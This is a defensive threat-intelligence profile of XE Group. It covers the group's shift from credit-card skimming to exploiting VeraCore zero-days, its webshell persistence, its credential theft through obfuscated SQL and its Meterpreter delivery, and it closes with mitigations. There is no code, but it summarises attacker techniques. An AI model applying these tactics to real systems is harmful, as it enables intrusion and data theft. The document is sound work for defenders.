Full Report
The Vietnam-based group has grown more sophisticated since 2013, new research shows. The post From credit card fraud to zero-day exploits: Xe Group expanding cybercriminal efforts appeared first on CyberScoop.
Analysis Summary
# Threat Actor: XE Group
## Attribution & Identity
* **Identification:** Vietnam-based cybercriminal organization.
* **Known Aliases and Associated Groups:** Tracked as XE Group. The group has been operating since at least 2013.
## Activity Summary
XE Group has evolved significantly since 2013, moving from foundational financial cybercrime to sophisticated, stealthy intelligence gathering and supply chain exploitation.
* **2013-~2023 (Early Activity):** Focused on credit-card skimming, targeting e-commerce platforms and exploiting known vulnerabilities in tools like Telerik UI for ASP.NET to deploy webshells for payment data theft.
* **2020:** Planted a webshell that remained dormant until 2024; used obfuscated Transact-SQL queries to extract database credentials for subsequent file uploads.
* **2024 (Recent Shift):** Shifted focus to targeted information theft by exploiting two zero-day vulnerabilities in **VeraCore**, a supply chain management software. This allowed infiltration, exfiltration of configuration files, and maintenance of long-term system access. They reactivated a webshell planted in 2020.
## Tactics, Techniques & Procedures
* Initial access via exploitation of known vulnerabilities (e.g., Telerik UI for ASP.NET) and more recently, zero-day vulnerabilities (VeraCore upload validation and SQL injection flaws).
* **Persistence:** Prioritizes long-term access, demonstrated by reactivating a webshell planted four years prior (2020 breach reused in 2024).
* **Webshell Usage:** Deploy customized variants of open-source webshells such as **ASPXSpy** (MITRE ATT&CK ID: S0073).
* **Credential Theft:** Extracted database credentials using obfuscated Transact-SQL queries (2020).
* **Lateral Movement/Reconnaissance (2024):** Used native Microsoft Windows utilities like `arp` and `netstat` for network mapping.
* **Command and Control (C2) / Payload Delivery (2024):** Utilized PowerShell scripts to load **Meterpreter malware** (a tool linked to APTs) to establish covert communication channels.
## Targeting
* **Sectors:** Initially e-commerce; currently focused heavily on **Manufacturing and Distribution sectors** due to the targeting of supply chain management software (VeraCore users).
* **Geography:** Global supply chains are at risk; the group itself is based in **Vietnam**.
* **Victims:** Fulfillment companies and retailers using VeraCore software.
## Tools & Infrastructure
* **Malware Families:** Meterpreter malware.
* **Webshells:** Customized variants of ASPXSpy.
* **Infrastructure:** Utilizes domains for command-and-control and hosting skimming tools.
* **Exploited Software:** Telerik UI for ASP.NET (older campaigns); VeraCore supply chain management software (recent zero-day exploitation).
## Implications
XE Group has rapidly evolved from a traditional cybercriminal entity focused on immediate financial gain (credit card skimming) into a highly sophisticated threat actor prioritizing stealth and long-term persistence. Their focus on zero-day exploitation within supply chain software elevates the risk profile, suggesting potential pivoting towards espionage or enabling larger cyber operations beyond simple data theft. Their operational discipline (maintaining access for 4+ years) poses significant detection challenges for victims.
## Mitigations
* Verify the status of the VeraCore SQL injection flaw (currently unpatched according to research).
* Apply vendor-issued temporary fixes immediately (e.g., VeraCore upload validation flaw fix).
* Enhance detection capabilities for known webshell activity, including customized ASPXSpy variants.
* Implement stringent monitoring for unusual network mapping (`arp`, `netstat`) and PowerShell activity used for payload loading.
* Review and audit credentials obtained via SQL queries that were last accessed in older breach timelines (2020) to prevent webshell reactivation.